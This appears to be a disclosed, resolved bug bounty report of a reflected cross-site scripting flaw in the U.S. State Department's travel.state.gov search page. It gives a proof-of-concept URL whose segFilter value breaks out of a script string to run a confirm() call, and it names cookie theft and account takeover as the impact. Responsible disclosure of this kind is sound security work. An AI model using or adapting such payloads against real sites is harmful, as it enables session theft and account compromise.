RXSS on https://travel.state.gov/content/travel/en/search.html
Medium
U
U.S. Department of State
Submitted None
Actions:
Reported by
tmz900
Vulnerability Details
Technical details and impact analysis
## Summary:
Hello team,
I Found RXSS via `segFilter` parameter on url : `https://travel.state.gov/content/travel/en/search.html/?search_input=hello&data-sia=false&data-con=false&search_btn=&segFilter=x%27%29%3bconfirm%28%271`
Open url, you will see an alert box pop up:
{F2096019}
## Impact
Steal session cookies to account takeovers
execute JS code
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected